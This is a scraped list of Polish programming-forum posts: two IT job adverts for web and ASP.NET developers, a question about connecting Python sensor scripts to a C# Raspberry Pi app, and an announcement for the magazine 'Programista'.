 22. Nasz Klient to międzynarodowa firma z branży IT, zajmująca czołową pozycję w projektowaniu systemów począwszy od zautomatyzowanych systemów video-kontroli po wiodące technologie dla przemysłu medycznego. Ponieważ rozwój światowej klasy technologii wymaga wysoce wykwalifikowanych, zmotywowanych, zorientowanych na sukces ludzi, poszukujemy utalentowanej osoby na stanowisko: FrontEnd/Web Developer Nr ref: WMS15FRLX Miejsce pracy: Warszawa / Zdalnie Opis stanowiska: rozwój, utrzymanie i pozycjonowanie firmowej strony internetowej budowa, rozwój i utrzymanie aplikacji webowych bezpośrednia praca z kierownikiem projektu przy określaniu wymagań i założeń bezpośrednia współpraca z działem marketingu/sprzedaży efektywne dostarczanie produktów projektowych rozwój przyjaznego interfejsu użytkownika tworzenie i rozwijanie elastycznej i wydajnej warstwy dostępu do danych współpraca z międzynarodowym zespołem Web Developerów Wymagania: co najmniej 2 lata doświadczenia na podobnym stanowisku przy komercyjnych projektach bardzo dobra znajomość standardów oraz technologii webowych (HTML5, CSS3, JavaScript/AJAX, jQuery, REST, JSON) bardzo dobra znajomość zasad projektowania graficznego bardzo dobra znajomość zasad SEO doświadczenie w budowie serwisów mobilnych oraz RWD dobra umiejętność programowania przy użyciu Visual Studio 2008/2010 i .NET 4.0 oraz C# dobra znajomość wzorca projektowego MVC, Razor dobra znajomość SQL, T-SQL – tworzenie rozwiązań, utrzymanie, optymalizacja bardzo dobra znajomość języka angielskiego zorientowanie na sukces ambicja i chęć rozwoju Mile widziane: znajomość metodyki Scrum znajomość PostgreSQL znajomość SVN Znajomość w/w wymagań będzie weryfikowana podczas rozmów kwalifikacyjnych. Oferujemy: praca projektowa / pół etatu duża możliwość rozwoju i podnoszenia kwalifikacji pracę w środowisku życzliwych profesjonalistów pracę w nowoczesnej, dynamicznie rozwijającej się firmie międzynarodowej możliwość wzięcia udziału w opracowywaniu i wdrażaniu nowoczesnych technologii konkurencyjne wynagrodzenie i inne dodatki uzależnione od umiejętności i doświadczenia Zainteresowane osoby prosimy o przesyłanie CV w języku angielskim na adres: m.stepien@jobfinder.pl Prośba o dodanie w wiadomości numeru referencyjnego oferty WMS15FRLX Prośba o dodanie klauzuli w CV: „Wyrażam zgodę na przetwarzanie moich danych osobowych zawartych w mojej ofercie pracy dla potrzeb niezbędnych do realizacji procesu rekrutacji, zgodnie z ustawa z dn. 29.08.97 o Ochronie Danych Osobowych, Dz. Ust. Nr 133 poz. 883.”
 23. Chcę storzyć aplikację graficzną pod Raspberry Pi w języku C# za pomocą MonoDevelop. Do tej pory napisałem programy w Pythonie, które odbierają dane z czujników po magistrali I2C i wyrzucają je w konsoli. Chciałbym móc korzystać z tych danych, móc swobodnie je matematycznie przekształcać, przedstawiać na wykresie. Czy mogę jakoś połączyć te dwa programy aby współpracowały?
 24. Cześć, Dzięki uprzejmości adminów mamy swój dział na Forum DevStart. Świetna sprawa! Będziemy tu informować Was o tym co słychać w redakcji, jakie artykuły planujemy w nadchodzących wydaniach, jakie materiały są w aktualnych numerach itp. Chętnie też poznamy Wasze opinie o magazynie i z miłą chęcią przyjmiemy sugestie na tematy artykułów. Jeśli nie zetknęliście się jeszcze miesięcznikiem "Programista", to zapraszamy do zapoznania się z nim. Udostępniliśmy bezpłatne wydania do pobrania: http://programistamag.pl/wydanie_probne/ Obecnie, tj. do 20 października w Empikach jest dostępne wydanie nr 39, a w nim np. : przedpremierowe, obszerne fragmenty książki Gynvaela Goldwinda "Zrozumieć programowanie". Książka będzie wydrukowana w ostatnich dniach tego miesiąca, a już teraz możecie się przekonać czy jest warta zakupu. Zamieściliśmy rozdziały: Synchronizacja, Muteksy i sekcje krytyczne, Typy stałoprzecinkowe, Przekierowania... Poza tym w aktualnym numerze znajdziecie artykuł o algorytmach rozpoznawania dźwięków pt." Symfonia problemów", "Kod Schrödingera, czyli maszyna abstrakcyjna języka", "Zaawansowane funkcje systemu Windows 10: śledzenie twarzy" i kilka innych... Spis treści aktualnego wydania: http://programistamag.pl/programista-8-2015-39/
 25. Witam Reprezentuję firmę ITalents Sp. z o.o., zajmującą się doradztwem personalnym i outsourcingiem IT. Mój klient to firma o ugruntowanej pozycji w branży IT, w zakresie swoich usług oferuje rozwiązania sieciowe, sprzęt komputerowy i informatyczny, integrację z istniejącymi systemami, wdrażanie oprogramowania i wiele innych. Oferujący bardzo dobre warunki pracy, ceniący nade wszystko samodzielność pilnie poszukuje osoby do pracy na stanowisko: ASP.NET Developer Miejsce pracy: Katowice Umowa B2B Zakres zadań: Udział w projektach informatycznych – realizacja pod nadzorem powierzonych w projekcie zadań. Uczestniczenie w procesie testowania i implementacji oprogramowania. Tworzenie systemów webowych oraz rozbudowa istniejących aplikacji – realizacja powierzonych przez liderów ścieżek projektowych zadań. Utrzymywanie systemu informatycznego od strony programistycznej. Testowanie prototypów. Tworzenie dokumentacji technicznej. Dokumentowanie pisanego kodu programistycznego. Budowa i dbałość o środowisko programistyczne. Przygotowywanie dokumentacji programistycznej. Wymagania wobec kandydata: Minimum 2 lata doświadczenia na podobnym stanowiska Znajomość programowania w ASP .NET MVC 4, Bardzo dobra znajomość .NET Podstawowa znajomość WAP (Windows Azure Pack) Znajomość języka C# . Oferujemy: Wynagrodzenie na zasadzie firma - firma Po 3 miesięcznym okresie próbnym dofinansowanie opieki medycznej w 70% Możliwość rozwoju zawodowego i awansu Udział w realizacji ciekawych projektów dla wiodących firm Udział w szkoleniach (nieodpłatne certyfikacje MS) Imprezy integracyjne W przypadku zainteresowania niniejszą ofertą pracy proszę o przesłanie CV na adres: rekrutacja@italents.pl Proszę o dodanie informacji na temat oczekiwań finansowych i dostępności. W nagłówku maila proszę umieścić informację „ASP.NET Developer, Katowice”
×
×
 • Create New...